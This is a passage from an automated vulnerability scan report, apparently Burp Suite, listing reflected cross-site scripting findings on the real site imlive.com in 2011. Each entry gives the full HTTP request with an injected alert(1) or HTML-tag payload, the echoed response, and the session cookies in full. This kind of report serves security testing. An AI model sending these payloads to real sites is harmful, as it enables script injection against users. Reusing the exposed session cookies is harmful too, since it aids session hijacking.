<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
4.549. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:15 GMT Connection: close Content-Length: 224539 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1"> ...[SNIP]...
4.550. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:40 GMT Connection: close Content-Length: 171563 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
4.551. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:23 GMT Connection: close Content-Length: 171425 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1"> ...[SNIP]...
4.552. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/liveexperts.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 19420 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'> ...[SNIP]...
4.553. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/localcompanionship.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:12 GMT Connection: close Content-Length: 16579 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'> ...[SNIP]...
4.554. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/minglesingles.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 16143 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp?1a452'><a>a6955adbf25=1&lr=1107816009&ud=0&pe=minglesingles.asp&qs=1a452'> ...[SNIP]...
4.555. http://imlive.com/pr.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/pr.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90148'><a>2e9c3e6d159 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /pr.asp?90148'><a>2e9c3e6d159=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:18 GMT Connection: close Content-Length: 9886 Vary: Accept-Encoding
4.556. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cf17'-alert(1)-'f7758fd0154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.asp?1cf17'-alert(1)-'f7758fd0154=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx?1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&qs=1cf17'-alert(1)-'f7758fd0154=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
4.557. http://imlive.com/preparesearch.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/preparesearch.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad584"><a>5bd7ab7e3b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /preparesearch.asp?ad584"><a>5bd7ab7e3b0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/preparesearch.aspx?ad584"><a>5bd7ab7e3b0=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.558. http://imlive.com/preparesearch.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/preparesearch.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed33"><a>4a10453e31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
